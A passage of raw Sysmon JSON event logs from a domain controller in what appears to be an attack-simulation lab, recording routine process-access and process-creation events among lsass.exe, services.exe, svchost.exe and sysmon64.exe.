C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.373","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1229,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.375\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 912\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001071C70200}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.375","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"912","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001071C70200}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1230,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.377\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001071C70200}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.377","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001071C70200}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1231,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.377\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 108\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001071C70200}\r\nTargetProcessId: 2516\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.377","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"108","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001071C70200}","TargetProcessId":"2516","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1232,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.389\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.389","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1233,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.389\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.389","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1234,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.389\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.389","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1235,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.367\r\nProcessGuid: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nProcessId: 2928\r\nImage: C:\\Windows\\sysmon64.exe\r\nFileVersion: 10.42\r\nDescription: System activity monitor\r\nProduct: Sysinternals Sysmon\r\nCompany: Sysinternals - www.sysinternals.com\r\nOriginalFileName: ?\r\nCommandLine: C:\\Windows\\sysmon64.exe\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=384B6FC04A512CFE7A4E628942867D95,SHA256=80B110B91730729BE60C7D79C55FFF0EC893FD4CFB5F44D04C433EE8E95C5E20,IMPHASH=30777134873A03E5D01D04EDE5BEC51E\r\nParentProcessGuid: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nParentProcessId: 852\r\nParentImage: C:\\Windows\\System32\\services.exe\r\nParentCommandLine: C:\\Windows\\system32\\services.exe","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.367","ProcessGuid":"{E2A3D6B1-106B-5F25-0000-001051C70200}","Image":"C:\\Windows\\sysmon64.exe","FileVersion":"10.42","Description":"System activity monitor","Product":"Sysinternals Sysmon","Company":"Sysinternals - www.sysinternals.com","OriginalFileName":"?","CommandLine":"C:\\Windows\\sysmon64.exe","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=384B6FC04A512CFE7A4E628942867D95,SHA256=80B110B91730729BE60C7D79C55FFF0EC893FD4CFB5F44D04C433EE8E95C5E20,IMPHASH=30777134873A03E5D01D04EDE5BEC51E","ParentProcessGuid":"{E2A3D6B1-1058-5F25-0000-001030530000}","ParentProcessId":"852","ParentImage":"C:\\Windows\\System32\\services.exe","ParentCommandLine":"C:\\Windows\\system32\\services.exe","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1236,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.392\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 2660\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\services.exe+12bee|C:\\Windows\\system32\\services.exe+66f4|C:\\Windows\\system32\\services.exe+5154|C:\\Windows\\system32\\services.exe+d608|C:\\Windows\\system32\\services.exe+20a11|C:\\Windows\\SYSTEM32\\ntdll.dll+2b9ae|C:\\Windows\\SYSTEM32\\ntdll.dll+29bc4|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed 